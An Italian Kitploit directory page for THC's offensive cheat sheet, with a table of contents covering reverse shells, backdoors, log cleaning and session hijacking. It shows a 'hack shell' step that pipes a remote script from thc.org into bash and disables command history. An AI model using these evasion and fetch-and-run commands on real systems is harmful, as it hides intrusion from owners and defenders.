Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
thc-tips-tricks-hacks-cheat-sheet — Vari suggerimenti e trucchi | Kitploit
Strumenti/GitHubGitHub/hackerschoice/thc-tips-tricks-hacks-cheat-sheet
OSINT (Open Source Intelligence)Meccanismi di PersistenzaMovimento LateraleEsfiltrazione DatiRaccolta InformazioniPost-ExploitPenetration TestingRed TeamingRisorse Curate

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Sviluppo Payload
GitHubhackerschoice/thc-tips-tricks-hacks-cheat-sheet

thc-tips-tricks-hacks-cheat-sheet

Vari suggerimenti e trucchi

Vedi Repository
3.9k471493 mesi faRevisionato da Kitploit

I trucchi preferiti di THC: Suggerimenti, Tricks & Hacks (Cheat Sheet)

https://thc.org/tips

Una raccolta dei nostri trucchi preferiti. Molti di questi trucchi non sono nostri. Ci limitiamo a raccoglierli.

Mostriamo i trucchi 'così come sono' senza spiegare perché funzionano. Devi conoscere Linux per capire come e perché funzionano.

Hai dei trucchi? Unisciti a noi https://thc.org/ops

  1. Bash
    1. Configurare una Hack Shell
    2. Nascondere i tuoi comandi
    3. Nascondere le opzioni della riga di comando
    4. Nascondere una connessione di rete
    5. Nascondere un processo come utente
    6. Nascondere un processo come root
    7. Nascondere script
    8. Nascondersi da cat
    9. Eseguire in parallelo con file di log separati
  2. SSH
    1. SSH quasi invisibile
    2. Più shell tramite 1 connessione SSH/TCP
    3. Tunnel SSH
    4. Tunnel SSH SOCKS5
    5. SSH verso host dietro NAT
    6. SSH pivot tramite ProxyJump
    7. SSHD come utente
  3. Rete
    1. Scoprire host
    2. Tcpdump
    3. Tunnel e inoltro
      1. Porte reverse TCP raw
      2. Reverse forward HTTPS
      3. Rimbalzare il traffico con iptables
      4. Ghost IP / IP Spoofing
      5. Varie
    4. Usare qualsiasi strumento tramite proxy SOCKS
    5. Trovare il tuo indirizzo IP pubblico
    6. Verificare la raggiungibilità da tutto il mondo
    7. Controllare/Scansionare le porte aperte
    8. Craccare hash di password
    9. Forza bruta su password / chiavi
  4. Upload/Download/Exfil dati
    1. Codifica/Decodifica di file
    2. Trasferimento file con taglia e incolla
    3. Trasferimento file con tmux
    4. Trasferimento file con screen
    5. Trasferimento file con gs-netcat e sftp
    6. Trasferimento file con HTTP
    7. Download di file senza curl
    8. Trasferimento file con rsync
    9. Trasferimento file verso siti di dump pubblici
    10. Trasferimento file con WebDAV
    11. Trasferimento file verso Telegram
  5. Reverse Shell / Dumb Shell
    1. Reverse Shell
      1. con gs-netcat (crittografato)
      2. con Bash
      3. con cURL (crittografato)
      4. con cURL (testo chiaro)
      5. con OpenSSL (crittografato)
      6. con remote.moe (crittografato)
      7. senza /dev/tcp
      8. con Python
      9. con Perl
      10. con PHP
    2. Migliorare la dumb shell
      1. Trasformare una reverse shell in una shell pty
      2. Trasformare una reverse shell in una shell completamente interattiva
      3. Reverse shell con socat (completamente interattiva)
  6. Backdoor
    1. gs-netcat
    2. sshx.io
    3. La più piccola backdoor SSHD
    4. Accesso remoto a un'intera rete
    5. La più piccola backdoor PHP
    6. La più piccola backdoor reverse DNS-tunnel
    7. Local Root backdoor
    8. Impianto auto-estraente
  7. Ricognizione host
  8. Trucchi per la shell
    1. Distruggere file (cancellazione sicura)
    2. Ripristinare la data di un file
    3. Pulire i file di log
    4. Nascondere file a un utente senza privilegi di root
    5. Rendere un file immutabile
    6. Cambiare utente senza sudo/su
    7. Offuscare e cifrare il payload
    8. Distribuire una backdoor senza toccare il file system
  9. Crittografia
    1. Generare rapidamente una password casuale
    2. File system crittografati trasportabili Linux
      1. cryptsetup
      2. EncFS
    3. Crittografare un file
  10. Sniffing e hijacking delle sessioni
    1. Sniffare la sessione SHELL di un utente
    2. Sniffare tutte le sessioni SHELL con dtrace
    3. Sniffare tutte le sessioni SHELL con eBPF
    4. Sniffare la sessione SSH o SSHD di un utente con strace
    5. Sniffare la sessione SSH in uscita di un utente con uno script wrapper
    6. Sniffare la sessione SSH in uscita di un utente con SSH-IT
    7. Dirottare / prendere il controllo di una sessione SSH in esecuzione
  11. VPN e Shell
    1. Server root usa e getta
    2. Fornitori VPN/VPS
  12. Raccolta di intelligence OSINT
  13. Varie
    1. Gli strumenti del mestiere
    2. Comandi Linux interessanti
    3. tmux Cheat Sheet
    4. Comandi utili
  14. Come diventare un hacker
  15. Altri siti

1. Bash / Shell

1.i. Configurare una Hack Shell (bash):

Rende BASH meno rumoroso. Disabilita ~/.bash_history e molte altre cose.```sh source <(curl -SsfL https://thc.org/hs)

URL alternativo:```sh
 source <(curl -SsfL https://github.com/hackerschoice/hackshell/raw/main/hackshell.sh)

E se non c'è curl/wget, usa surl e curl (temporaneamente) installato con bin curl.```sh source <(surl https://raw.githubusercontent.com/hackerschoice/hackshell/main/hackshell.sh)

Afterwards type bin curl to (temporarily) install curl (in memory).

HackShell fa molto di più, ma soprattutto questo:```sh
unset HISTFILE
[ -n "$BASH" ] && export HISTFILE="/dev/null"
export BASH_HISTORY="/dev/null"
export LANG=en_US.UTF-8
locale -a 2>/dev/null|grep -Fqim1 en_US.UTF || export LANG=en_US
export LESSHISTFILE=-
export REDISCLI_HISTFILE=/dev/null
export MYSQL_HISTFILE=/dev/null
TMPDIR="/tmp"
[ -d "/var/tmp" ] && TMPDIR="/var/tmp"
[ -d "/dev/shm" ] && TMPDIR="/dev/shm"
export TMPDIR
export PATH=".:${PATH}"
if [[ "$SHELL" == *"zsh" ]]; then
    PS1='%F{red}%n%f@%F{cyan}%m %F{magenta}%~ %(?.%F{green}.%F{red})%#%f '
else
    PS1='\[\033[36m\]\u\[\033[m\]@\[\033[32m\]\h:\[\033[33;1m\]\w\[\033[m\]\$ '
fi
alias wget='wget --no-hsts'
alias vi="vi -i NONE"
alias vim="vim -i NONE"
alias screen="screen -ln"

TERM=xterm reset -I
stty cols 400 # paste this on its own before pasting the next line:
resize &>/dev/null || { stty -echo;printf "\e[18t"; read -t5 -rdt R;IFS=';' read -r -a a <<< "${R:-8;25;80}";[ "${a[1]}" -ge "${a[2]}" ] && { R="${a[1]}";a[1]="${a[2]}";a[2]="${R}";};stty sane rows "${a[1]}" cols "${a[2]}";}
# stty sane rows 60 cols 160

Usiamo molto anew, e questa è una soluzione rapida:```shell xanew() { awk 'hit[$0]==0 {hit[$0]=1; print $0}'; } which anew &>/dev/null || alias anew=xanew

Suggerimento bonus:
Qualsiasi comando che inizi con uno " " (spazio) [non verrà registrato nella cronologia](https://unix.stackexchange.com/questions/115917/why-is-bash-not-storing-commands-that-start-with-spaces) nemmeno.```
$  id

1.ii. Nascondi il tuo comando / Daemonizza il tuo comando

Scarica lo strumento